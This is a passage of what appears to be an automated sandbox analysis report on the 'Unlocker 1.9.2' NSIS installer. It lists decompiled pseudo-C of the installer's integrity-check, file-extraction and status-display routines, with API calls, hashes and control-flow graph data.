                                                                                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                                                                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                              • String ID: .B$N$Remove folder: $open$]t
                                                                                                                                                              • API String ID: 3615053054-215059723
                                                                                                                                                              • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                                                              • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                                                                                                                                              • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                                                              • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

[Control-flow graph 595 for the function at 402c22; node legend: Executed / Not Executed]
                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E00402C22(void* __eflags, signed int _a4) {
                                                                                                                                                              				DWORD* _v8;
                                                                                                                                                              				DWORD* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				long _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				signed int _v44;
                                                                                                                                                              				long _t43;
                                                                                                                                                              				signed int _t50;
                                                                                                                                                              				void* _t53;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				void* _t57;
                                                                                                                                                              				intOrPtr* _t59;
                                                                                                                                                              				long _t60;
                                                                                                                                                              				signed int _t65;
                                                                                                                                                              				signed int _t67;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				signed int _t71;
                                                                                                                                                              				signed int _t77;
                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                              				long _t82;
                                                                                                                                                              				signed int _t85;
                                                                                                                                                              				signed int _t87;
                                                                                                                                                              				void* _t89;
                                                                                                                                                              				signed int _t90;
                                                                                                                                                              				signed int _t93;
                                                                                                                                                              				void* _t94;
                                                                                                                                                              
                                                                                                                                                              				_t82 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t43 = GetTickCount();
                                                                                                                                                              				_t91 = "C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe";
                                                                                                                                                              				 *0x423e8c = _t43 + 0x3e8;
                                                                                                                                                              				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Unlocker1.9.2.exe", 0x400);
                                                                                                                                                              				_t89 = E004056B4(_t91, 0x80000000, 3);
                                                                                                                                                              				_v16 = _t89;
                                                                                                                                                              				 *0x409014 = _t89;
                                                                                                                                                              				if(_t89 == 0xffffffff) {
                                                                                                                                                              					return "Error launching installer";
                                                                                                                                                              				}
                                                                                                                                                              				_t92 = "C:\\Users\\jones\\Desktop";
                                                                                                                                                              				E004059DD("C:\\Users\\jones\\Desktop", _t91);
                                                                                                                                                              				E004059DD(0x42b000, E00405517(_t92));
                                                                                                                                                              				_t50 = GetFileSize(_t89, 0);
                                                                                                                                                              				__eflags = _t50;
                                                                                                                                                              				 *0x41f028 = _t50;
                                                                                                                                                              				_t93 = _t50;
                                                                                                                                                              				if(_t50 <= 0) {
                                                                                                                                                              					L24:
                                                                                                                                                              					E00402BBE(1);
                                                                                                                                                              					__eflags =  *0x423e94 - _t82; // 0xce00
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						goto L29;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _v8 - _t82;
                                                                                                                                                              					if(_v8 == _t82) {
                                                                                                                                                              						L28:
                                                                                                                                                              						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                                                                                              						_t94 = _t53;
                                                                                                                                                              						_t54 =  *0x423e94; // 0xce00
                                                                                                                                                              						E00403080(_t54 + 0x1c);
                                                                                                                                                              						_push(_v24);
                                                                                                                                                              						_push(_t94);
                                                                                                                                                              						_push(_t82);
                                                                                                                                                              						_push(0xffffffff); // executed
                                                                                                                                                              						_t57 = E00402E5B(); // executed
                                                                                                                                                              						__eflags = _t57 - _v24;
                                                                                                                                                              						if(_t57 == _v24) {
                                                                                                                                                              							__eflags = _v44 & 0x00000001;
                                                                                                                                                              							 *0x423e90 = _t94;
                                                                                                                                                              							 *0x423e98 =  *_t94;
                                                                                                                                                              							if((_v44 & 0x00000001) != 0) {
                                                                                                                                                              								 *0x423e9c =  *0x423e9c + 1;
                                                                                                                                                              								__eflags =  *0x423e9c;
                                                                                                                                                              							}
                                                                                                                                                              							_t40 = _t94 + 0x44; // 0x44
                                                                                                                                                              							_t59 = _t40;
                                                                                                                                                              							_t85 = 8;
                                                                                                                                                              							do {
                                                                                                                                                              								_t59 = _t59 - 8;
                                                                                                                                                              								 *_t59 =  *_t59 + _t94;
                                                                                                                                                              								_t85 = _t85 - 1;
                                                                                                                                                              								__eflags = _t85;
                                                                                                                                                              							} while (_t85 != 0);
                                                                                                                                                              							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                                                                                              							 *(_t94 + 0x3c) = _t60;
                                                                                                                                                              							E00405675(0x423ea0, _t94 + 4, 0x40);
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              							return 0;
                                                                                                                                                              						}
                                                                                                                                                              						goto L29;
                                                                                                                                                              					}
                                                                                                                                                              					E00403080( *0x40b018);
                                                                                                                                                              					_t65 = E0040304E( &_a4, 4); // executed
                                                                                                                                                              					__eflags = _t65;
                                                                                                                                                              					if(_t65 == 0) {
                                                                                                                                                              						goto L29;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _v12 - _a4;
                                                                                                                                                              					if(_v12 != _a4) {
                                                                                                                                                              						goto L29;
                                                                                                                                                              					}
                                                                                                                                                              					goto L28;
                                                                                                                                                              				} else {
                                                                                                                                                              					do {
                                                                                                                                                              						_t67 =  *0x423e94; // 0xce00
                                                                                                                                                              						_t90 = _t93;
                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                              						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                                                                                                                              						__eflags = _t93 - _t70;
                                                                                                                                                              						if(_t93 >= _t70) {
                                                                                                                                                              							_t90 = _t70;
                                                                                                                                                              						}
                                                                                                                                                              						_t71 = E0040304E(0x417028, _t90); // executed
                                                                                                                                                              						__eflags = _t71;
                                                                                                                                                              						if(_t71 == 0) {
                                                                                                                                                              							E00402BBE(1);
                                                                                                                                                              							L29:
                                                                                                                                                              							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                                                              						}
                                                                                                                                                              						__eflags =  *0x423e94;
                                                                                                                                                              						if( *0x423e94 != 0) {
                                                                                                                                                              							__eflags = _a4 & 0x00000002;
                                                                                                                                                              							if((_a4 & 0x00000002) == 0) {
                                                                                                                                                              								E00402BBE(0);
                                                                                                                                                              							}
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						E00405675( &_v44, 0x417028, 0x1c);
                                                                                                                                                              						_t77 = _v44;
                                                                                                                                                              						__eflags = _t77 & 0xfffffff0;
                                                                                                                                                              						if((_t77 & 0xfffffff0) != 0) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v40 - 0xdeadbeef;
                                                                                                                                                              						if(_v40 != 0xdeadbeef) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v28 - 0x74736e49;
                                                                                                                                                              						if(_v28 != 0x74736e49) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v32 - 0x74666f73;
                                                                                                                                                              						if(_v32 != 0x74666f73) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v36 - 0x6c6c754e;
                                                                                                                                                              						if(_v36 != 0x6c6c754e) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						_a4 = _a4 | _t77;
                                                                                                                                                              						_t87 =  *0x40b018; // 0x10753b
                                                                                                                                                              						 *0x423f20 =  *0x423f20 | _a4 & 0x00000002;
                                                                                                                                                              						_t80 = _v20;
                                                                                                                                                              						__eflags = _t80 - _t93;
                                                                                                                                                              						 *0x423e94 = _t87;
                                                                                                                                                              						if(_t80 > _t93) {
                                                                                                                                                              							goto L29;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _a4 & 0x00000008;
                                                                                                                                                              						if((_a4 & 0x00000008) != 0) {
                                                                                                                                                              							L16:
                                                                                                                                                              							_v8 = _v8 + 1;
                                                                                                                                                              							_t24 = _t80 - 4; // 0x40915c
                                                                                                                                                              							_t93 = _t24;
                                                                                                                                                              							__eflags = _t90 - _t93;
                                                                                                                                                              							if(_t90 > _t93) {
                                                                                                                                                              								_t90 = _t93;
                                                                                                                                                              							}
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _a4 & 0x00000004;
                                                                                                                                                              						if((_a4 & 0x00000004) != 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						goto L16;
                                                                                                                                                              						L20:
                                                                                                                                                              						__eflags = _t93 -  *0x41f028; // 0x10753f
                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                              							_v12 = E00405D6B(_v12, 0x417028, _t90);
                                                                                                                                                              						}
                                                                                                                                                              						 *0x40b018 =  *0x40b018 + _t90;
                                                                                                                                                              						_t93 = _t93 - _t90;
                                                                                                                                                              						__eflags = _t93;
                                                                                                                                                              					} while (_t93 > 0);
                                                                                                                                                              					_t82 = 0;
                                                                                                                                                              					__eflags = 0;
                                                                                                                                                              					goto L24;
                                                                                                                                                              				}
                                                                                                                                                              			}


































                                                                                                                                                              APIs
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Unlocker1.9.2.exe,00000400), ref: 00402C4F
                                                                                                                                                                • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 004056B8
                                                                                                                                                                • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Unlocker1.9.2.exe,C:\Users\user\Desktop\Unlocker1.9.2.exe,80000000,00000003), ref: 00402C9B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$(pA$-XF$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Unlocker1.9.2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                              • API String ID: 4283519449-2808966413
                                                                                                                                                              • Opcode ID: 8dd25270827e0f4bb7ccacab167cf8c400ed2e02d2919ad4f76227d9ce4bc1d1
                                                                                                                                                              • Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
                                                                                                                                                              • Opcode Fuzzy Hash: 8dd25270827e0f4bb7ccacab167cf8c400ed2e02d2919ad4f76227d9ce4bc1d1
                                                                                                                                                              • Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t41;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				FILETIME* _t49;
                                                                                                                                                              				FILETIME* _t62;
                                                                                                                                                              				void* _t64;
                                                                                                                                                              				signed int _t70;
                                                                                                                                                              				FILETIME* _t71;
                                                                                                                                                              				FILETIME* _t75;
                                                                                                                                                              				signed int _t77;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              
                                                                                                                                                              				_t75 = __ebx;
                                                                                                                                                              				_t82 = E004029F6(0x31);
                                                                                                                                                              				 *(_t85 - 8) = _t82;
                                                                                                                                                              				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                                                                                                                              				_t33 = E0040553D(_t82);
                                                                                                                                                              				_push(_t82);
                                                                                                                                                              				if(_t33 == 0) {
                                                                                                                                                              					lstrcatA(E004054D0(E004059DD(0x409b50, "C:\\Program Files\\Unlocker")), ??);
                                                                                                                                                              				} else {
                                                                                                                                                              					_push(0x409b50);
                                                                                                                                                              					E004059DD();
                                                                                                                                                              				}
                                                                                                                                                              				E00405C3F(0x409b50);
                                                                                                                                                              				while(1) {
                                                                                                                                                              					__eflags =  *(_t85 + 8) - 3;
                                                                                                                                                              					if( *(_t85 + 8) >= 3) {
                                                                                                                                                              						_t64 = E00405CD8(0x409b50);
                                                                                                                                                              						_t77 = 0;
                                                                                                                                                              						__eflags = _t64 - _t75;
                                                                                                                                                              						if(_t64 != _t75) {
                                                                                                                                                              							_t71 = _t64 + 0x14;
                                                                                                                                                              							__eflags = _t71;
                                                                                                                                                              							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                                                                                                                              						}
                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                              						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                                                              						__eflags = _t70;
                                                                                                                                                              						 *(_t85 + 8) = _t70;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                              					if( *(_t85 + 8) == _t75) {
                                                                                                                                                              						E00405695(0x409b50);
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *(_t85 + 8) - 1;
                                                                                                                                                              					_t41 = E004056B4(0x409b50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                                                              					__eflags = _t41 - 0xffffffff;
                                                                                                                                                              					 *(_t85 - 0x34) = _t41;
                                                                                                                                                              					if(_t41 != 0xffffffff) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                              					if( *(_t85 + 8) != _t75) {
                                                                                                                                                              						E00404D7B(0xffffffe2,  *(_t85 - 8));
                                                                                                                                                              						__eflags =  *(_t85 + 8) - 2;
                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                              							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                                                              						}
                                                                                                                                                              						L31:
                                                                                                                                                              						 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                                                              						__eflags =  *0x423f08;
                                                                                                                                                              						goto L32;
                                                                                                                                                              					} else {
                                                                                                                                                              						E004059DD(0x40a350, 0x424000);
                                                                                                                                                              						E004059DD(0x424000, 0x409b50);
                                                                                                                                                              						E004059FF(_t75, 0x40a350, 0x409b50, "C:\Users\jones\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                                                                                                                              						E004059DD(0x424000, 0x40a350);
                                                                                                                                                              						_t62 = E0040529E("C:\Users\jones\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                                                                                                                              						__eflags = _t62;
                                                                                                                                                              						if(_t62 == 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							__eflags = _t62 == 1;
                                                                                                                                                              							if(_t62 == 1) {
                                                                                                                                                              								 *0x423f08 =  &( *0x423f08->dwLowDateTime);
                                                                                                                                                              								L32:
                                                                                                                                                              								_t49 = 0;
                                                                                                                                                              								__eflags = 0;
                                                                                                                                                              							} else {
                                                                                                                                                              								_push(0x409b50);
                                                                                                                                                              								_push(0xfffffffa);
                                                                                                                                                              								E00404D7B();
                                                                                                                                                              								L29:
                                                                                                                                                              								_t49 = 0x7fffffff;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L33:
                                                                                                                                                              					return _t49;
                                                                                                                                                              				}
                                                                                                                                                              				E00404D7B(0xffffffea,  *(_t85 - 8)); // executed
                                                                                                                                                              				 *0x423f34 =  *0x423f34 + 1;
                                                                                                                                                              				_push(_t75);
                                                                                                                                                              				_push(_t75);
                                                                                                                                                              				_push( *(_t85 - 0x34));
                                                                                                                                                              				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                                                                                                                                              				_t43 = E00402E5B(); // executed
                                                                                                                                                              				 *0x423f34 =  *0x423f34 - 1;
                                                                                                                                                              				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                                                                                                                              				_t80 = _t43;
                                                                                                                                                              				if( *(_t85 - 0x18) != 0xffffffff) {
                                                                                                                                                              					L22:
                                                                                                                                                              					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                                                                                                                              					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                                                                                                                              						goto L22;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                                                                                                                                              				__eflags = _t80 - _t75;
                                                                                                                                                              				if(_t80 >= _t75) {
                                                                                                                                                              					goto L31;
                                                                                                                                                              				} else {
                                                                                                                                                              					__eflags = _t80 - 0xfffffffe;
                                                                                                                                                              					if(_t80 != 0xfffffffe) {
                                                                                                                                                              						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffee);
                                                                                                                                                              					} else {
                                                                                                                                                              						E004059FF(_t75, _t80, 0x409b50, 0x409b50, 0xffffffe9);
                                                                                                                                                              						lstrcatA(0x409b50,  *(_t85 - 8));
                                                                                                                                                              					}
                                                                                                                                                              					_push(0x200010);
                                                                                                                                                              					_push(0x409b50);
                                                                                                                                                              					E0040529E();
                                                                                                                                                              					goto L29;
                                                                                                                                                              				}
                                                                                                                                                              				goto L33;
                                                                                                                                                              			}
















                                                                                                                                                              0x004017b7
                                                                                                                                                              0x004017ba
                                                                                                                                                              0x004017bd
                                                                                                                                                              0x004017c0
                                                                                                                                                              0x004017c0
                                                                                                                                                              0x004017c7
                                                                                                                                                              0x004017d6
                                                                                                                                                              0x004017db
                                                                                                                                                              0x004017de
                                                                                                                                                              0x004017e1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004017e3
                                                                                                                                                              0x004017e6
                                                                                                                                                              0x00401840
                                                                                                                                                              0x00401845
                                                                                                                                                              0x004015a8
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040288b
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004017e8
                                                                                                                                                              0x004017ee
                                                                                                                                                              0x004017f9
                                                                                                                                                              0x00401806
                                                                                                                                                              0x00401811
                                                                                                                                                              0x00401827
                                                                                                                                                              0x00401827
                                                                                                                                                              0x0040182a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401830
                                                                                                                                                              0x00401830
                                                                                                                                                              0x00401831
                                                                                                                                                              0x0040184e
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00401833
                                                                                                                                                              0x00401833
                                                                                                                                                              0x00401834
                                                                                                                                                              0x00401492
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x00401831
                                                                                                                                                              0x0040182a
                                                                                                                                                              0x00402896
                                                                                                                                                              0x0040289a
                                                                                                                                                              0x0040289a
                                                                                                                                                              0x0040185e
                                                                                                                                                              0x00401863
                                                                                                                                                              0x00401869
                                                                                                                                                              0x0040186a
                                                                                                                                                              0x0040186b
                                                                                                                                                              0x0040186e
                                                                                                                                                              0x00401871
                                                                                                                                                              0x00401876
                                                                                                                                                              0x0040187c
                                                                                                                                                              0x00401880
                                                                                                                                                              0x00401882
                                                                                                                                                              0x0040188a
                                                                                                                                                              0x00401896
                                                                                                                                                              0x00401884
                                                                                                                                                              0x00401884
                                                                                                                                                              0x00401888
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401888
                                                                                                                                                              0x0040189f
                                                                                                                                                              0x004018a5
                                                                                                                                                              0x004018a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004018ad
                                                                                                                                                              0x004018ad
                                                                                                                                                              0x004018b0
                                                                                                                                                              0x004018c8
                                                                                                                                                              0x004018b2
                                                                                                                                                              0x004018b5
                                                                                                                                                              0x004018be
                                                                                                                                                              0x004018be
                                                                                                                                                              0x004018cd
                                                                                                                                                              0x004018d2
                                                                                                                                                              0x00402209
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402209
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,show,C:\Program Files\Unlocker,00000000,00000000,00000031), ref: 00401773
                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,show,show,00000000,00000000,show,C:\Program Files\Unlocker,00000000,00000000,00000031), ref: 0040179D
                                                                                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,Unlocker 1.9.2 Setup,NSIS Error), ref: 004059EA
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                              • String ID: C:\Program Files\Unlocker$C:\Users\user\AppData\Local\Temp\nsv5446.tmp$C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll$show
                                                                                                                                                              • API String ID: 1941528284-462429751
                                                                                                                                                              • Opcode ID: 89dec647013ee6528c2b69545b8c488e5fa697e94d303dfd7bd1404993c1dcdb
                                                                                                                                                              • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                                                                                                                                              • Opcode Fuzzy Hash: 89dec647013ee6528c2b69545b8c488e5fa697e94d303dfd7bd1404993c1dcdb
                                                                                                                                                              • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 860 404d7b-404d90 861 404e46-404e4a 860->861 862 404d96-404da8 860->862 863 404db3-404dbf lstrlenA 862->863 864 404daa-404dae call 4059ff 862->864 866 404dc1-404dd1 lstrlenA 863->866 867 404ddc-404de0 863->867 864->863 866->861 868 404dd3-404dd7 lstrcatA 866->868 869 404de2-404de9 SetWindowTextA 867->869 870 404def-404df3 867->870 868->867 869->870 871 404df5-404e37 SendMessageA * 3 870->871 872 404e39-404e3b 870->872 871->872 872->861 873 404e3d-404e40 872->873 873->861
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00404D7B(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				CHAR* _v32;
                                                                                                                                                              				long _v44;
                                                                                                                                                              				int _v48;
                                                                                                                                                              				void* _v52;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                              				signed int _t27;
                                                                                                                                                              				CHAR* _t28;
                                                                                                                                                              				long _t29;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              
                                                                                                                                                              				_t26 =  *0x423664; // 0x403f4
                                                                                                                                                              				_v8 = _t26;
                                                                                                                                                              				if(_t26 != 0) {
                                                                                                                                                              					_t27 =  *0x423f34; // 0x0
                                                                                                                                                              					_v12 = _t27;
                                                                                                                                                              					_t39 = _t27 & 0x00000001;
